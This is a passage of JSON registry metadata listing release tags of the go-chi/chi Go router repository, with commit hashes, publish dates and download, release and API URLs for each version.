:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/c